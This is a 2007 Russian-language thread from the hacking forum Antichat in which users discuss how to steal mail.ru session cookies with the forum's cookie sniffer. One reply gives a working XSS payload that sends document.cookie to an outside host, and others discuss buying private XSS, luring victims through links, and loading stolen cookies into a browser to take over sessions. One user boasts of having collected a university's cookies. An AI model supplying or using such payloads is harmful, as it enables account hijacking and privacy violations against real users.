Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Снифер античата и mail.ru (https://forum.antichat.xyz/showthread.php?t=40575)

cigaretteburn 21.05.2007 23:00

Снифер античата и mail.ru
 
Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??

ice1k 21.05.2007 23:06

Для этого тебе нужна XSS на mail.ru ;)

Ksander 21.05.2007 23:15

Цитата:

Сообщение от ice1k
Для этого тебе нужна XSS на mail.ru ;)


Если просматривать письмо через Ж то можно украсть сессию. Только как нужно его просматривать я не знаю =(

Naf 21.05.2007 23:16

а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.

DimOnOID 21.05.2007 23:16

Цитата:

Сообщение от cigaretteburn
Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??

снач можешь прочитать вот тут потом можешь посмареть тут а уже потом ...или найти самому активную или пасссиввную...или зайти сюда или сюда и поискать пост с XSS на mail.ru

cigaretteburn 22.05.2007 00:50

Цитата:

Сообщение от Naf
а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.

Как это толку? в опере меняеш куки и всё..

cigaretteburn 22.05.2007 00:54

Цитата:

Сообщение от ice1k
Для этого тебе нужна XSS на mail.ru ;)

ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа? :)

nc.STRIEM 22.05.2007 01:14

Цитата:

Сообщение от cigaretteburn
ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа? :)

просто код вот:
Код:

<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
Разве что за $

ultimatum 22.05.2007 01:24

Цитата:

естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,

Algol 22.05.2007 01:55

Цитата:

Сообщение от ultimatum
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,

Куда бы ты не заманивал пользователя, все равно должен быть xss на целевом сайте (в данном случае mail.ru)


Время: 13:01